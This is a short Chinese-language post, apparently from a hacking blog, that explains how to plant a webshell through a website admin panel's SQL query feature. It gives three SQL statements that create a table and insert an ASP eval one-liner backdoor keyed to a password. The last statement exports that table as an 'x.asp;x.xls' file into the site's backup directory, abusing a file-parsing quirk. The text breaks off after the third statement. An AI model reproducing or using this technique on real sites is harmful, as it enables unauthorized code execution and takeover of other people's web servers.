今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤 第一句代码 create table cmd (a varchar(50)) 第二句代码 insert into cmd (a) values (‘<%evalrequest(“qing520”)%>’) 第三句代码 select * into [a] in ‘d:wwwrootwjqcadadmin163Databackupx.asp;x.xls’ ‘excel 4.0;’ ...